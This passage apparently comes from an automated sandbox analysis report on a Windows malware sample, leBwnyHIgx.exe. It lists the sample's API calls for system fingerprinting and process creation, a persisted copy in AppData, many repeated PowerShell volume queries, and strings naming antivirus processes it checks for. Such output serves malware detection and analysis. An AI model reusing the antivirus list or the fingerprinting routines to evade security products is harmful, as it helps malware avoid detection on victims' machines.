                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_005B1248 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 0_2_005B1248
                      Source: leBwnyHIgx.exe, 00000005.00000002.4135196957.0000000004571000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inProgram Manager0
                      Source: leBwnyHIgx.exe, 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .168.2.4 0 min287400Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_004067C0 cpuid 0_2_004067C0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 0_2_0040C9BC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: GetLocaleInfoW, 0_2_005FB6B8
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0040BE44
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 5_2_0040C9BC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: GetLocaleInfoW, 5_2_005FB6B8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_0040BE44
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, 5_2_03075430
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0061A76C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,0_2_0061A76C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00601070 GetSystemTimeAsFileTime,FileTimeToSystemTime,0_2_00601070
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03085D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_03085D22
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_004270EC GetVersionExW,0_2_004270EC
                      Source: leBwnyHIgx.exe Binary or memory string: acs.exe
                      Source: leBwnyHIgx.exe Binary or memory string: vsserv.exe
                      Source: leBwnyHIgx.exe Binary or memory string: avcenter.exe
                      Source: leBwnyHIgx.exe Binary or memory string: kxetray.exe
                      Source: leBwnyHIgx.exe Binary or memory string: cfp.exe
                      Source: leBwnyHIgx.exe Binary or memory string: avp.exe
                      Source: leBwnyHIgx.exe Binary or memory string: KSafeTray.exe
                      Source: leBwnyHIgx.exe Binary or memory string: 360Safe.exe
                      Source: leBwnyHIgx.exe Binary or memory string: rtvscan.exe
                      Source: leBwnyHIgx.exe Binary or memory string: 360tray.exe
                      Source: leBwnyHIgx.exe Binary or memory string: ashDisp.exe
